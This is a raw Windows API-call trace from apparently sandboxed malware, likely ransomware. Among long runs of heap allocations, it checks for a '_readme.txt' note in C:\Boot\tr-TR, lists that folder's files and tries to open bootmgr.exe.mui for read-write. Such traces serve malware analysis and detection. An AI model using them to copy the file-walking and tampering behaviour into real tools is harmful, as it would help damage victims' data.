[0093.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.171] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.171] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.171] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.171] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.171] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.171] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.171] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.171] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.171] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.171] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.171] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.171] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.171] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.171] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.172] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.172] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.172] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.172] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.172] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.172] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.172] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.172] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.172] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.172] PathFindFileNameW (pszPath="C:\\Boot\\tr-TR\\") returned="tr-TR\\" [0093.172] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.172] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.172] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.172] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.172] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.172] PathFindFileNameW (pszPath="") returned="" [0093.172] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.172] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.173] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.173] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0093.173] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.173] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99ca4f0 [0093.173] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.173] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.173] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.174] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.174] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.174] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.174] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0093.174] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.174] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.174] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x81c) returned 0x99ca4f0 [0093.174] PathAppendW (in: pszPath="C:\\Boot\\tr-TR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0093.174] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.174] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.174] PathFileExistsW (pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0093.174] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.174] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.174] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa347d1e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa347d1e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31c7500 [0093.174] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.175] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa347d1e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa347d1e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.175] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.175] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.175] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3268 [0093.175] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.175] PathFindExtensionW (pszPath="C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned=".mui" [0093.175] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.175] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3268 | out: hHeap=0x680000) returned 1 [0093.175] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa347d1e0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa347d1e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa347d1e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.175] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.175] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3268 [0093.175] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.175] PathFindExtensionW (pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned=".txt" [0093.175] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3268 | out: hHeap=0x680000) returned 1 [0093.175] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa347d1e0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa347d1e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa347d1e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.175] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0093.176] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.176] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef540 | out: hHeap=0x680000) returned 1 [0093.176] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0093.176] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef540 [0093.176] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0093.176] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.176] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.176] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.176] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.176] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 